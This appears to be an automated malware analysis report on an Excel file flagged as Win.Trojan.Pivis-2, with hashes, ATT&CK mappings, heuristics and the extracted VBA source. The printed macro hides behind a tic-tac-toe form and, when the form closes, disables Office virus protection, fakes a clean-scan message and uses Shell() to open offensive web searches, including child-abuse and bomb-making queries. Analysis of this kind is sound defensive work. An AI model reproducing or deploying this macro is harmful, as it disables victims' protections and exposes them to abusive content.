Win.Trojan.Pivis-2 — Office (OOXML) malware analysis

Static analysis result for SHA-256 06a0a50873f5f8d2…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 42.3 KB
Created: 2021-06-30 07:54:03 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-07-07
MD5: 20e945803e6dc87675860062079e5288
SHA-1: 25da70364bf1acfbf22775a8b45ab01177e8ec80
SHA-256: 06a0a50873f5f8d2153e5c13c5a06bcf0b45607fc9029ca06bfe5ee99919d340
Risk score: 260

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample is an Office document whose VBA macros call the Shell() function, a critical indicator of malicious activity. The document body explicitly instructs the user to 'Enable macros and disable antivirus'; combined with the VBA Shell() call, this strongly suggests the macro is designed to download and execute a secondary payload. The ClamAV detection of 'Win.Trojan.Pivis-2' further supports this assessment.

Heuristics (5)

  • ClamAV: Win.Trojan.Pivis-2 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA project inside OOXML (severity: medium, rule: OOXML_VBA, 1 related finding)
    Document contains a VBA project; VBA macros present
  • Shell() call in VBA (severity: critical, rule: OLE_VBA_SHELL)
    The VBA code calls Shell(), which launches an external program
  • Security software disable instruction (severity: high, rule: SE_SECURITY_BYPASS)
    Document instructs the user to disable antivirus or security software; unusual for ordinary documents and high-risk in an unsolicited file
  • Macro/content-enable lure (severity: medium, rule: SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing; a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
  Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 6314 bytes
  SHA-256: e23779c073ca93680dfbaf6f4b8a190ad82dff9484ebea170de9de7971b3caf0

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "jugenmofo88"
Attribute VB_Base = "0{336CE18E-5901-4331-B2D1-4419E3718E22}{A8F79920-6D2F-480A-8A11-94A7FCC22B7B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub b1_Click()
    If b1.Caption = "" Then
        b1.Caption = "O"
    ElseIf b1.Caption = "O" Then
        b1.Caption = "X"
    Else: b1.Caption = "O"
    End If
End Sub

Private Sub b10_Click()
b1.Caption = ""
b2.Caption = ""
b3.Caption = ""
b4.Caption = ""
b5.Caption = ""
b6.Caption = ""
b7.Caption = ""
b8.Caption = ""
b9.Caption = ""
End Sub

Private Sub b2_Click()
    If b2.Caption = "" Then
        b2.Caption = "O"
    ElseIf b2.Caption = "O" Then
        b2.Caption = "X"
    Else: b2.Caption = "O"
    End If
End Sub

Private Sub b3_Click()
    If b3.Caption = "" Then
        b3.Caption = "O"
    ElseIf b3.Caption = "O" Then
        b3.Caption = "X"
    Else: b3.Caption = "O"
    End If
End Sub

Private Sub b4_Click()
    If b4.Caption = "" Then
        b4.Caption = "O"
    ElseIf b4.Caption = "O" Then
        b4.Caption = "X"
    Else: b4.Caption = "O"
    End If
End Sub

Private Sub b5_Click()
    If b5.Caption = "" Then
        b5.Caption = "O"
    ElseIf b5.Caption = "O" Then
        b5.Caption = "X"
    Else: b5.Caption = "O"
    End If
End Sub

Private Sub b6_Click()
    If b6.Caption = "" Then
        b6.Caption = "O"
    ElseIf b6.Caption = "O" Then
        b6.Caption = "X"
    Else: b6.Caption = "O"
    End If
End Sub

Private Sub b7_Click()
    If b7.Caption = "" Then
        b7.Caption = "O"
    ElseIf b7.Caption = "O" Then
        b7.Caption = "X"
    Else: b7.Caption = "O"
    End If
End Sub

Private Sub b8_Click()
    If b8.Caption = "" Then
        b8.Caption = "O"
    ElseIf b8.Caption = "O" Then
        b8.Caption = "X"
    Else: b8.Caption = "O"
    End If
End Sub

Private Sub b9_Click()
    If b9.Caption = "" Then
        b9.Caption = "O"
    ElseIf b9.Caption = "O" Then
        b9.Caption = "X"
    Else: b9.Caption = "O"
    End If
End Sub

Private Sub UserForm_Initialize()
tolong.Visible = False
End Sub

Private Sub UserForm_Terminate()
do_the_stuff
End Sub

Attribute VB_Name = "jaknpoi"
' ">=D3rqw*)#=4J`K*(c86$q`xvdGxwy=3(ha+$qa*>t^!Kg9!Jt9
' ")"83v'94b"85v9A4JqA4ac?5rqK3a`=xv+`3>ddxwy93?}G3)594>&8+wyG4wq=48ll
' %(uD5auJ+$qF3b59+vud4JqA4Jq:3byA3>4F{:q((rqw%Jtl

Sub start()
jugenmofo88.Show
End Sub

' $vux*&99$vtF{:cl
Sub do_the_stuff()
Dim bruh, jakom, jakom2
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.Caption = "Office sucks. Use LibreOffice instead"
Application.StatusBar = True
Application.StatusBar = "No viruses were detected during the scan."
If Month() = 6 & Day() = 4 Then
Application.StatusBar = "FREE TIBET THE TIANANMEN SQUARE PROTESTS OF 1989 THE TIANANMEN SQUARE MASSACRE THE ANTI-RIGHTIST STRUGGLE THE GREAT LEAP FORWARD THE GREAT PROLETARIAN CULTURAL REVOLUTION HUMAN RIGHTS DEMOCRATIZATION FREEDOM"
End If

bruh = Shell("iexplore google.com/search?q=loli+hentai", 1)
bruh = Shell("iexplore google.com/search?q=how+to+make+a+bomb", 1)
bruh = Shell("iexplore google.com/search?q=porn", 1)
bruh = Shell("iexplore google.com/search?q=school+filter+bypass", 1)
bru
... (truncated)
Artifact 2
  Filename: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: xl/vbaProject.bin
  Size: 40448 bytes
  SHA-256: e84a8d961deed09ae2500b8cd4da2621b0931c840ee9d80741904fb82568d30d
  Detection: ClamAV: Win.Trojan.Pivis-2
  Obfuscation or payload: unlikely